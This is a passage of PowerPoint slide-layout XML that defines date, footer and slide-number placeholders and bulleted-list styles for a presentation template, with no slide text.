            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{55415B51-8A65-4568-8BBB-1CD8CB042866}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82DA154-3509-423A-A6BC-41D50566FF83}"/>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451421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A9229FB9-D5CC-4BEB-8271-6274E4E1CADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9F4026D0-EFBA-40DA-B761-EDDC26209FF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DECD667-FD97-4515-9F1B-6A3AF3AB22B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613847C-1742-43D2-82E6-B03D9EA4B8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F20248B0-C886-4009-A50D-70CE221CAE61}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17475078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2527D0-F74B-418D-B632-0EA88926B7F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{97E48540-8786-41D1-BB5B-A5DD7BAA4348}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A64318E5-636B-4351-B066-A100BACE086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2FD52DB-BEB9-408C-8666-0061A3018978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E9E15AC0-1573-4E51-A127-CF4335BC7121}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13871278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2EF5CA-2B67-4EEC-A83F-FBF962068551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{25DC69B6-BA3B-4D50-B3F2-BF6B49EEF11A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8214F533-B98F-4F63-8134-C671FC8DB00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90B903B-56F7-46E3-AFDE-7A412B5F98D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E35C44E9-71EE-4DE6-A35C-AB315268FD20}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25526117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BCC91DB-60C9-4193-BED1-44DF327EE8C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9083B69A-EFE6-4590-BF5E-DAB031BFE1BC}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C1AE22-BF73-42D5-9E53-DCAA2C898A7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9AA30D8-27C5-41DB-B40B-D762F46449ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FEB3F9D1-658F-4BF2-9260-8DDD77597CE6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29672141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C463C44A-F813-4978-9BB8-6257D457622E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FA96049C-1766-44EF-8A93-89ED547DF4FC}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C797552-15B5-42F4-A016-2C7F9A8FCB9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B3AC3E74-5539-4F10-A247-5EFAC3E67356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{985F8F1B-5EDF-4624-99CE-D8A79A90D946}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20403095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88449938-EFE5-4E5E-BCB7-040AC46F9AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{439F09E8-C463-44BE-9230-7DC830F91C91}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F298BB-0093-4C91-A051-4177F0692E15}"/>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5905E032-474B-4DE5-A75D-3A98A3D660FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B4F016B1-B9B4-45E6-8A92-8839A0DE6BE2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12117476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1D7047B-73B0-4A9B-A186-360345DCC99D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1B11E8AE-9B8F-42F3-A5EE-A997662EF4E4}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E04B22-1600-4012-8F69-DE98173972C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B14872AE-BF21-48AB-A549-73B0D643513B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7936503D-9BD4-47EC-8F99-00740A91D370}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3780430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6C16690-095F-4910-9F83-E9282D9B7E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{81028196-D37E-4EF9-A1F2-6E59A19ECE5E}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B0D2BE-35B6-49A2-98C9-289F06CA81A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BD0C555-0EAC-45AD-89F3-FBD09B225E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B0CE3233-56E6-4DBC-8525-E8A1A18522F1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986355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bulleted list">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522000" y="1512000"/>
            <a:ext cx="8136000" cy="48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174625" indent="-174625">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="363538" indent="-174625">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="-174625">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="712788" indent="-174625">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="901700" indent="-174625">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="18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85468442"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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C354D30-800E-4B37-A9F6-75F608AA3F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{11F9627C-DF4C-4DE9-AF2B-3009C924B115}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0611B752-D83C-4117-8748-83F52E7BC92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C29E58F-A2B8-44DE-991A-0891667D13D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1A4D58E8-0B51-4BF5-B5BD-0FDEE3FCE676}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29338894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E2F1AD-7A6F-4C26-A3EE-F6779D825671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A321DA8F-7979-4752-BC0D-2F2485FC7F8A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD68B18-AA74-4033-B311-F145A6B6974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041A691-AB50-476E-92C0-950B4EB0A341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BD1E749-BFBE-4314-9AA5-DA6F53EAA934}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3252528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F58DB0-C204-4594-8177-02F24A04DD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F7F64D25-DA93-4AD3-9716-49069E2BF56B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/19/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{466FB1DA-8E6D-4DD6-9789-B23FEA2CC13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B8AC64A-922C-4697-9EB2-1A1C1E168785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A78BE7EB-883F-46C7-B567-590ADC7E4DF0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333016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two columns">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
